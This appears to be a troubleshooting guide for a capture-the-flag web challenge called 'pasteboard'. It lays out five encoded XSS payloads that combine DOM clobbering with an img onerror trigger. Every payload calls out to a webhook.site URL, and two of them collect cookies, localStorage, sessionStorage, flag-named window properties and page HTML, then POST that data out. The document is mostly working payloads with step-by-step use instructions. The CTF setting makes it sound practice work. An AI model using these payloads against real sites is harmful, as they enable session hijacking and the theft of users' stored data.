═══════════════════════════════════════════════════════════════════════════════
🚨 TROUBLESHOOTING GUIDE - No Webhook Response
═══════════════════════════════════════════════════════════════════════════════

Challenge: https://pasteboard-1fb68b7836775bea.chals.uoftctf.org/
Webhook: https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078

═══════════════════════════════════════════════════════════════════════════════
📋 STEP-BY-STEP VERIFICATION
═══════════════════════════════════════════════════════════════════════════════

STEP 1: Create the Paste
─────────────────────────────────────────────────────────────────────────────
1. Go to: https://pasteboard-1fb68b7836775bea.chals.uoftctf.org/note/new
2. Leave "Title" field empty (or enter anything)
3. Paste PAYLOAD 1 (below) into the "Body" field
4. Click "Create Note"
5. You'll be redirected to a URL like:
   https://pasteboard-1fb68b7836775bea.chals.uoftctf.org/note/XXXXXXXX
6. COPY THIS FULL URL

STEP 2: Report to Bot
─────────────────────────────────────────────────────────────────────────────
1. Go to: https://pasteboard-1fb68b7836775bea.chals.uoftctf.org/report
2. Paste the FULL note URL from step 1
3. Click Submit
4. You should see "Queued" message

STEP 3: Wait and Check
─────────────────────────────────────────────────────────────────────────────
1. Keep your webhook tab open: 
   https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078
2. Wait 5-10 seconds (bot visits within 30 seconds)
3. Webhook should receive a request

═══════════════════════════════════════════════════════════════════════════════
🧪 TEST PAYLOADS - Try in This Order
═══════════════════════════════════════════════════════════════════════════════

PAYLOAD 1: ULTRA-SIMPLE (Start Here!)
─────────────────────────────────────────────────────────────────────────────
<form id="errorReporter"><input name="path" value="data:text/javascript,fetch('https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078?ping=1')"></form><img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">

✅ If webhook receives ?ping=1 → XSS is working! Try more complex payloads
❌ If no response → Something is wrong with the basic setup


PAYLOAD 2: Multiple Pings
─────────────────────────────────────────────────────────────────────────────
<form id="errorReporter"><input name="path" value="data:text/javascript,fetch%28%27https%3A//webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078%3Fstep%3D1%27%29%3BsetTimeout%28%28%29%20%3D%3E%20fetch%28%27https%3A//webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078%3Fstep%3D2%27%29%2C%201000%29%3BsetTimeout%28%28%29%20%3D%3E%20fetch%28%27https%3A//webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078%3Fstep%3D3%27%29%2C%202000%29%3B"></form><img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">

→ Sends 3 requests (step=1, step=2, step=3)
→ Tests if timing matters


PAYLOAD 3: Comprehensive Data Dump
─────────────────────────────────────────────────────────────────────────────
<form id="errorReporter"><input name="path" value="data:text/javascript,%20%28async%20%28%29%20%3D%3E%20%7B%20%20%20%20%20const%20data%20%3D%20%7B%20%20%20%20%20%20%20%20%20timestamp%3A%20Date.now%28%29%2C%20%20%20%20%20%20%20%20%20cookie%3A%20document.cookie%2C%20%20%20%20%20%20%20%20%20storage%3A%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20local%3A%20Object.keys%28localStorage%29.map%28k%20%3D%3E%20%28%7Bkey%3A%20k%2C%20val%3A%20localStorage%5Bk%5D%7D%29%29%2C%20%20%20%20%20%20%20%20%20%20%20%20%20session%3A%20Object.keys%28sessionStorage%29.map%28k%20%3D%3E%20%28%7Bkey%3A%20k%2C%20val%3A%20sessionStorage%5Bk%5D%7D%29%20%20%20%20%20%20%20%20%20%7D%2C%20%20%20%20%20%20%20%20%20location%3A%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20href%3A%20location.href%2C%20%20%20%20%20%20%20%20%20%20%20%20%20origin%3A%20location.origin%2C%20%20%20%20%20%20%20%20%20%20%20%20%20pathname%3A%20location.pathname%20%20%20%20%20%20%20%20%20%7D%2C%20%20%20%20%20%20%20%20%20document%3A%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20title%3A%20document.title%2C%20%20%20%20%20%20%20%20%20%20%20%20%20referrer%3A%20document.referrer%2C%20%20%20%20%20%20%20%20%20%20%20%20%20domain%3A%20document.domain%20%20%20%20%20%20%20%20%20%7D%2C%20%20%20%20%20%20%20%20%20window%3A%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20FLAG%3A%20window.FLAG%2C%20%20%20%20%20%20%20%20%20%20%20%20%20flag%3A%20window.flag%2C%20%20%20%20%20%20%20%20%20%20%20%20%20flagKeys%3A%20Object.keys%28window%29.filter%28k%20%3D%3E%20k.toLowerCase%28%29.includes%28%27flag%27%29%29%20%20%20%20%20%20%20%20%20%7D%2C%20%20%20%20%20%20%20%20%20html%3A%20document.body.innerHTML.substring%280%2C%20500%29%20%20%20%20%20%7D%3B%20%20%20%20%20await%20fetch%28%27https%3A//webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078%27%2C%20%7Bmethod%3A%20%27POST%27%2C%20body%3A%20JSON.stringify%28data%2C%20null%2C%202%29%7D%29%3B%20%7D%29%28%29%3B%20"></form><img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">

→ Sends ALL available data as POST
→ Check webhook POST body for cookie, localStorage, window properties


PAYLOAD 4: Delayed Cookie Check
─────────────────────────────────────────────────────────────────────────────
<form id="errorReporter"><input name="path" value="data:text/javascript,%20setTimeout%28%28%29%20%3D%3E%20%7B%20%20%20%20%20const%20data%20%3D%20%7B%20%20%20%20%20%20%20%20%20cookie%3A%20document.cookie%2C%20%20%20%20%20%20%20%20%20location%3A%20location.href%2C%20%20%20%20%20%20%20%20%20title%3A%20document.title%2C%20%20%20%20%20%20%20%20%20storage%3A%20%7B...localStorage%7D%2C%20%20%20%20%20%20%20%20%20windowProps%3A%20Object.keys%28window%29.filter%28k%20%3D%3E%20k.toLowerCase%28%29.includes%28%27flag%27%29%29%20%20%20%20%20%7D%3B%20%20%20%20%20fetch%28%27https%3A//webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078%27%2C%20%7B%20%20%20%20%20%20%20%20%20method%3A%20%27POST%27%2C%20%20%20%20%20%20%20%20%20body%3A%20JSON.stringify%28data%29%20%20%20%20%20%7D%29%3B%20%7D%2C%205000%29%3B%20"></form><img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">

→ Waits 5 seconds before checking
→ Maybe flag is set asynchronously


PAYLOAD 5: Image + Fetch (Dual Method)
─────────────────────────────────────────────────────────────────────────────
<form id="errorReporter"><input name="path" value="data:text/javascript,var%20img%20%3D%20new%20Image%28%29%3Bimg.src%20%3D%20%27https%3A//webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078%3Fmethod%3Dimage_ping%27%3Bfetch%28%27https%3A//webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078%3Fmethod%3Dfetch_ping%27%29%3B"></form><img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">

→ Uses both Image and fetch()
→ At least one should work


═══════════════════════════════════════════════════════════════════════════════
❓ COMMON ISSUES & SOLUTIONS
═══════════════════════════════════════════════════════════════════════════════

ISSUE: No webhook response at all
─────────────────────────────────────────────────────────────────────────────
✓ Did you paste the payload in the BODY field (not title)?
✓ Did you report the NOTE URL (not the /report URL)?
   ✅ Correct: https://pasteboard-.../note/abc123
   ❌ Wrong: https://pasteboard-.../report
✓ Is your webhook still open/active?
✓ Did you wait 30 seconds?

ISSUE: "Failed to fetch" or CORS errors
─────────────────────────────────────────────────────────────────────────────
→ CSP allows connect-src *, so this shouldn't happen
→ Try PAYLOAD 5 (Image method)

ISSUE: XSS works but no flag found
─────────────────────────────────────────────────────────────────────────────
→ Try chrome:// navigation payloads (see ALTERNATIVE_PAYLOADS.py)
→ The flag might require CDP access (advanced)
→ Check if cookie appears after delay (PAYLOAD 4)

═══════════════════════════════════════════════════════════════════════════════
🎯 NEXT STEPS AFTER CONFIRMING XSS WORKS
═══════════════════════════════════════════════════════════════════════════════

1. Once PAYLOAD 1 works, you know XSS is executing
2. Try PAYLOAD 3 to see what data is available
3. If still no flag, the challenge likely needs:
   - Chrome DevTools Protocol access (CDP)
   - Navigation to chrome:// URLs
   - Or the flag is set differently than expected

4. Run these Python scripts for advanced payloads:
   python ALTERNATIVE_PAYLOADS.py
   python CDP_MASTER_GUIDE.py

═══════════════════════════════════════════════════════════════════════════════
💡 REMEMBER
═══════════════════════════════════════════════════════════════════════════════

The XSS vulnerability is REAL and WORKING (you've tested it locally).
If webhook gets NOTHING, it's likely:
  1. Paste wasn't created correctly
  2. Wrong URL was reported to bot
  3. Bot didn't visit (rare)
  4. Webhook closed/expired

Start with PAYLOAD 1 - if that works, everything else will follow!

═══════════════════════════════════════════════════════════════════════════════